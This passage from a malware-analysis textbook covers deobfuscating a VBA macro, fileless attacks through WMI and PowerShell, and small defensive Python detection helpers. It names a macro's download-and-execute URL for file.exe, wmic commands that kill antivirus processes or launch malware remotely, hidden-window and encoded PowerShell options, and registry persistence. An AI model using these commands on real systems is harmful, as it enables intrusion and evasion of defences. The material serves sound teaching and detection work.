If you scroll down through the code, you also see VMSXE.Eval(NAQGP). Eval, similar to the one we encountered in JavaScript, is meant to evaluate or execute a piece of code supplied to it as a string parameter. This means the variable NAQGP, which is supplied to the Eval function, is likely to contain some kind of deobfuscated code at the point where it is called. If you execute the code up to the point where this Eval is invoked, you can expect the NAQGP variable to hold deobfuscated content.
Figure 20-23 shows the debugger after execution has stopped at the breakpoint we have set at this location.
The decoded VBA code printed from the NAQGP variable, which is executed by Eval(), contains a URL that points to file.exe on the host with IP address 216.170.126.3. The macro appears to download this file from http://216.170.126.3/wfil/file.exe, as indicated by the HTTP GET request. The contents of the downloaded file.exe are saved to a file whose path is held in FullX, which is then executed, as seen from the command ShellObj.Exec(FullX).
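Once the deobfuscated text has been copied out of the debugger, pulling the network indicators out of it can be automated. The following Python snippet is a minimal sketch of that step, not part of the original analysis: the function names and the sample line (including the HttpObj identifier) are hypothetical stand-ins for whatever the NAQGP variable actually holds.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Matches http/https URLs up to the first whitespace, quote, or bracket.
URL_PATTERN = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)


def extract_urls(decoded_script: str) -> List[str]:
    """Return the unique URLs in a deobfuscated script, in order of appearance."""
    urls: List[str] = []
    for match in URL_PATTERN.findall(decoded_script):
        if match not in urls:
            urls.append(match)
    return urls


def summarize(url: str) -> Dict[str, Optional[str]]:
    """Split a URL into the host and path an analyst would report as indicators."""
    parsed = urlparse(url)
    return {"host": parsed.hostname, "path": parsed.path}


if __name__ == "__main__":
    # Hypothetical line standing in for the text dumped from NAQGP.
    sample = 'HttpObj.open "GET", "http://216.170.126.3/wfil/file.exe", False'
    for url in extract_urls(sample):
        print(url, summarize(url))
```

The regular expression is deliberately simple. It will miss URLs that the script assembles from string fragments at runtime, which is why dumping the variable at the Eval call is the more reliable source.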
Apart from the VBA debugger in the Office tools and oledump.py, which we explored, other tools can also help you analyze VBA malware. Some of the well-known ones are OleTools, OffVis, and OfficeMalScanner. As an exercise, try out these other tools and figure out how they work.
Fileless Malware
So far, most of the malware we have seen has a file on the hard drive that is executed to create a malicious process. This poses a risk for the malware, since antivirus products constantly scan the hard drive for malicious files. To evade these disk scans, malware authors came up with fileless malware, in which the malware's contents are never written to the disk.
Fileless malware can be created in multiple ways. If the malware is a PE executable hosted on a remote malicious server, a loader can download its contents and carry out process hollowing entirely in memory, inserting the contents of the malicious PE executable into another hollowed process without ever writing them to the disk. The other readily available technique is to use the Windows scripting system to run malicious scripts.
Windows Management Instrumentation (WMI)
Windows Management Instrumentation (WMI) is an implementation of Web-Based Enterprise Management (WBEM), a standard for managing desktops, servers, and shares in an enterprise environment. It exists to help administrators monitor systems and automate administrative tasks across an enterprise.
WMI is built into Windows and is widely used as an administrative tool, so it is less likely to be blocked or treated as suspicious by network administrators. These two factors make WMI a good candidate for carrying out malicious attacks. Attackers can use the existing WMI framework instead of installing new malware, an approach called living off the land. The earliest known malicious use of WMI was in the infamous Stuxnet attack. It is now gaining popularity among attackers for carrying out fileless attacks.
As malware analysts, we need not look at the fine implementation of WMI. Superficially we can consider WMI as a database that is enriched with information related to the current state of the system. It can contain detailed information/data about processes, services, hardware, and so forth, which WMI organizes into WMI classes. The classes are further grouped into namespaces. As an example, Win32_Process is a class that stores information about processes and is part of the root/cimv2 namespace.
You can also query WMI data directly from the Windows command prompt using the wmic command provided by Windows, which is what malware frequently uses. If you remember, in the previous chapter we talked about how malware evades security systems and analysis tools by enumerating the environment it is executing in. Malware can do the same using WMI queries.
As seen, the WMI query lists all processes that have the string vm in their names. Since the analysis VM in which we ran this command is installed on VMware Workstation, we can see some of the VMware guest-related processes on the system.
WMI Queries to Get the System Model and MAC Address of the Network Interfaces
The output of the commands shows that the system model and MAC address are related to VMware. Isn’t this easy compared to calling several Windows APIs to obtain the same information?
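To see why a MAC address gives the virtual machine away, it helps to look at its first three bytes, the vendor prefix (OUI). The Python sketch below checks a MAC address against prefixes commonly documented as registered to VMware. It is an illustration for analysts deciding which artifacts of their analysis VM to change. The function names are hypothetical, and the prefix list is an assumption that may be incomplete.

```python
# Vendor prefixes (OUIs) commonly documented as registered to VMware.
# Assumption: this list is illustrative and may not be exhaustive.
VMWARE_OUIS = {"00:05:69", "00:0C:29", "00:1C:14", "00:50:56"}

HEX_DIGITS = set("0123456789ABCDEF")


def normalize_mac(mac: str) -> str:
    """Convert a MAC address in any common notation to AA:BB:CC:DD:EE:FF."""
    digits = "".join(ch for ch in mac.upper() if ch.isalnum())
    if len(digits) != 12 or not set(digits) <= HEX_DIGITS:
        raise ValueError(f"not a valid MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def is_vmware_mac(mac: str) -> bool:
    """Return True if the MAC address starts with a known VMware prefix."""
    return normalize_mac(mac)[:8] in VMWARE_OUIS


if __name__ == "__main__":
    for mac in ("00-0c-29-ab-cd-ef", "00:1A:2B:3C:4D:5E"):
        print(mac, is_vmware_mac(mac))
```

Changing the virtual network adapter's MAC address to one outside these prefixes is one way to remove this particular giveaway from an analysis VM.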
WMI Commands For Process
Command | Description |
---|---|
wmic process where name="antivirus.exe" call terminate | Kills a process with name antivirus.exe |
wmic.exe process call create malware.exe | Launches process for malware.exe file |
wmic.exe /node:remote_ip process call create "malware.exe" | Launches malware.exe on a remote system whose IP address is remote_ip |
WMI commands can be triggered from VBA scripts in Word documents and from PowerShell script files. Because WMI is available in scripting frameworks like VBA and PowerShell, it has made evasion techniques that would otherwise have been difficult much easier for malware to code.
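From the defender's side, the wmic usages in the table are easy to recognize in process command lines collected during dynamic analysis. The following Python sketch labels a command line according to those three patterns. The rule names and the classify_wmic function are hypothetical, and the patterns are assumptions that cover only the command forms shown in this section.

```python
import re
from typing import List

# One rule per behavior from the wmic table; patterns are case-insensitive.
WMIC_RULES = [
    ("remote execution", re.compile(r"/node:", re.IGNORECASE)),
    ("process creation", re.compile(r"\bprocess\b.*\bcall\s+create\b", re.IGNORECASE)),
    ("process termination", re.compile(r"\bprocess\b.*\bcall\s+terminate\b", re.IGNORECASE)),
]

WMIC_BINARY = re.compile(r"\bwmic(\.exe)?\b", re.IGNORECASE)


def classify_wmic(command_line: str) -> List[str]:
    """Return the labels of all rules that a wmic command line matches."""
    if not WMIC_BINARY.search(command_line):
        return []  # not a wmic invocation at all
    return [label for label, pattern in WMIC_RULES if pattern.search(command_line)]


if __name__ == "__main__":
    print(classify_wmic('wmic process where name="antivirus.exe" call terminate'))
    print(classify_wmic('wmic.exe /node:remote_ip process call create "malware.exe"'))
```

A match is only a lead for further analysis, since administrators use the same commands legitimately.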
PowerShell
PowerShell was created to cater to the automation needs on Windows, especially for administrative purposes. PowerShell has extensive access to the system resources and can access WMI as well. It can execute commands on local as well as remote machines. Also, PowerShell has some command-line options that can hide its presence from plain sight. Another powerful option that PowerShell provides is in-memory execution of PowerShell scripting code, which is used by attackers to carry out fileless malware attacks. These PowerShell attributes make it an appropriate tool to carry out malicious attacks.
The PowerShell scripts are written using PowerShell commands called cmdlets and PowerShell functions. In the next section, we look at some basics of cmdlets and some important cmdlets.
Cmdlets and Aliases
Command-lets, or cmdlets, are the commands available in the PowerShell scripting language. Cmdlets are .NET classes compiled into DLL files, which are accessible from PowerShell scripts or the PowerShell environment. Let’s try out some cmdlets to understand how they work.
You can access the PowerShell scripting environment by typing Windows PowerShell in your Start menu, which shows you the Windows PowerShell application. Open this application, which is very similar to the regular Windows command prompt, except that the prompt starts with PS to identify the environment as PowerShell. You can type your PowerShell commands there.
If you look at the output, the first column shows the type of the command, the second its name, and the third its description. The output contains three types of commands: cmdlet, function, and alias. We already know that cmdlets are compiled .NET classes, whereas functions are written in the PowerShell scripting language itself.
The cmdlet names are in the verb-noun format (e.g., Start-Process). The function names used in this chapter also combine a verb and a noun, but without the hyphen (e.g., DownloadString). An alias is an alternate name for a cmdlet, function, executable, and so forth. For example, IEX is an alias for the Invoke-Expression cmdlet. An alias name can be anything, since it only points to another cmdlet or function. That is why obfuscated PowerShell scripts rely on aliases: attackers use random, odd-looking alias names that point to other cmdlets, functions, and executables so that analysts find it hard to analyze the scripts statically.
To find the alias that corresponds to a cmdlet, you can use the Get-Alias command. The Get-Alias -Definition Invoke-Expression command gets the alias for the Invoke-Expression cmdlet, which is iex. If you want to know the cmdlet or function that a particular alias points to, you can use the same Get-Alias command in combination with the Windows findstr command. The PowerShell command Get-Alias | findstr "iex" gets you the cmdlet whose alias is iex.
Some Commonly Used Commands and Functions Used by Malware
Command/Functions | Alias | Description |
---|---|---|
Invoke-Expression | IEX | Evaluates expression |
Invoke-Command | ICM | Executes command on local or remote machine |
Start-Process | start/saps | Starts a process |
Get-WmiObject | gwmi | WMI class information |
DownloadFile | | Downloads file to disk |
DownloadString | | Downloads a web page to memory |
shellexecute | | Executes a command |
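When reading a script statically, replacing known aliases with the cmdlets they point to makes the intent easier to follow. The Python sketch below does this for the built-in aliases listed in the table. The expand_aliases function is a hypothetical helper, and it assumes the script uses only these default aliases. Aliases that an attacker defines inside the script itself are not handled.

```python
import re

# Built-in aliases from the table above, mapped to their cmdlets.
ALIASES = {
    "iex": "Invoke-Expression",
    "icm": "Invoke-Command",
    "start": "Start-Process",
    "saps": "Start-Process",
    "gwmi": "Get-WmiObject",
}

# Match an alias only when it stands alone, so that "Start-Process" or
# "restart" are left untouched.
ALIAS_TOKEN = re.compile(
    r"(?<![\w-])(" + "|".join(ALIASES) + r")(?![\w-])", re.IGNORECASE
)


def expand_aliases(script: str) -> str:
    """Replace known PowerShell aliases in a script with their cmdlet names."""
    return ALIAS_TOKEN.sub(lambda m: ALIASES[m.group(1).lower()], script)


if __name__ == "__main__":
    print(expand_aliases("IEX $payload"))
    print(expand_aliases("gwmi Win32_Process"))
```

This is plain text substitution, so it also rewrites alias-like words that appear inside string literals. Treat the result as a reading aid, not as an equivalent script.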
Cmdlets can be called directly from a PowerShell script. But to call a function, you need to create an object from the .NET class that contains the function and then access the member function through that object.
Example PowerShell Script That Shows Usage Of Cmdlet and Functions
In the PowerShell script code, the first line downloads malware.exe, hosted on the malwareurl server, to a local file named virus.exe using the DownloadFile function. The DownloadFile function is part of the System.Net.WebClient .NET class. An object is created from this class using the New-Object cmdlet, and the DownloadFile function, which is a method of System.Net.WebClient, is then called on it. The second line shows the usage of the Start-Process cmdlet, which executes the virus.exe file.
In-Memory Attacks
Some of the PowerShell Command-Line Parameters
Command Option | Description |
---|---|
-file | Option to pass script file to PowerShell |
-Command / -c | Executes PowerShell commands directly from the prompt instead of script |
-Nop / -Noprofile | Ignores commands in the profile file |
-WindowStyle hidden / -w hidden | Hides the window from the user |
-Exec Bypass | Bypasses execution policies or restriction on the system related to PowerShell |
-EncodedCommand / -e / -Enc | Passes encoded commands which are mostly base64 encoded |
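These options tend to appear together in malicious command lines, so spotting them is a useful first triage step. The following Python sketch flags the options from the table in a captured command line. The rule labels and the flag_powershell function are hypothetical. The patterns cover only the spellings shown in the table plus the full parameter names, whereas PowerShell also accepts other abbreviations.

```python
import re
from typing import List

# Label -> pattern for each option in the table. (?<!\S) requires the
# option to start a new whitespace-separated token.
FLAG_RULES = {
    "no profile": r"(?<!\S)-nop(rofile)?\b",
    "hidden window": r"(?<!\S)-w(indowstyle)?\s+hidden\b",
    "execution policy bypass": r"(?<!\S)-exec(utionpolicy)?\s+bypass\b",
    "encoded command": r"(?<!\S)-(encodedcommand|enc|e)\s+[A-Za-z0-9+/=]+",
    "inline command": r"(?<!\S)-c(ommand)?\s",
}


def flag_powershell(command_line: str) -> List[str]:
    """Return labels for the table's options found in a PowerShell command line."""
    if "powershell" not in command_line.lower():
        return []  # not a PowerShell invocation
    return [
        label
        for label, pattern in FLAG_RULES.items()
        if re.search(pattern, command_line, re.IGNORECASE)
    ]


if __name__ == "__main__":
    print(flag_powershell("powershell.exe -nop -w hidden -c Start-Process(calc.exe)"))
```

A command line that combines a hidden window, no profile, and an inline or encoded command deserves a closer look, although each option on its own also has legitimate uses.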
After you hit Enter, the prompt vanishes, and calc.exe (the calculator) pops up. If it were a malware executable instead of the calculator program, you would get no hint of the PowerShell execution, since the PowerShell prompt vanishes. And since most malware has no GUI, you wouldn’t be alerted to the start of the malware process either.
PowerShell Script Passed As a Command-Line Argument Value
PowerShell Command That Runs Another Encoded PowerShell Command
The long encoded string is the base64-encoded form of the PowerShell command powershell.exe -nop -w hidden -c Start-Process(calc.exe). To verify this, you can copy the base64 string and decode it using any online base64 decoder.
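If you prefer not to paste samples into an online service, the decoding can be done locally. PowerShell's -EncodedCommand option expects the base64 encoding of a UTF-16LE string, so the decoded bytes must be interpreted as UTF-16LE and not as ASCII. The Python sketch below shows this. The function name is hypothetical, and the short sample string is our own and not the one from the listing.

```python
import base64


def decode_encoded_command(b64_text: str) -> str:
    """Decode the argument of PowerShell's -EncodedCommand option.

    The argument is base64 over the UTF-16LE bytes of the command text.
    """
    raw = base64.b64decode(b64_text)
    return raw.decode("utf-16-le")


if __name__ == "__main__":
    # Our own short sample: the three characters "iex" in UTF-16LE, base64-encoded.
    print(decode_encoded_command("aQBlAHgA"))  # prints: iex
```

A generic base64 decoder shows the same text with a null byte after every character, which is the visible sign of the UTF-16LE encoding.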
If you are an attacker, you can place this entire command as a run entry in the registry, as you learned in Chapter 8, so that the command line is executed on bootup without needing a script file on the disk. This technique can maintain persistence in fileless attacks.
Attackers Using In-Memory Execution to Run Malicious Scripts Hosted Remotely
More complex attacks, such as reflective DLL injection, can also be carried out using this in-memory execution feature of PowerShell. The attacks can be made more sophisticated by using WMI in the scripts along with other persistence mechanisms, all while living off the land with tools provided natively by the Windows OS environment.
PowerShell scripts can also be debugged using PowerShell ISE, the integrated scripting environment for PowerShell, which includes a debugger. You can apply the same deobfuscation tricks we used in debugging JavaScript and VBA programs using PowerShell ISE, which we leave as an exercise for you.
Summary
Scripting-based malware attacks are widespread. They allow attackers to leverage the various programming and scripting environments natively available in the OS, in effect letting them live off the land. In this chapter, we explored JavaScript malware and how to deobfuscate and dissect it, both statically and dynamically, to figure out its functionality. We also explored the various kinds of obfuscation techniques commonly used by obfuscators on scripting code.
We then explored Visual Basic scripting malware and the more commonly used VBA macro malware that is embedded in and distributed via malicious Microsoft Office documents. You learned how to use the VBA debugger in the Microsoft Office tools to debug the macros embedded in these files. You also learned how to use other analysis tools like oledump.py to dump and analyze these macros and other executable files embedded within these documents, a technique frequently used by attackers to ship malicious PE executables.
Lastly, we covered WMIC and PowerShell-based scripts, which attackers leverage to launch covert attacks that are fileless and in-memory, leaving few traces of their execution on the disk.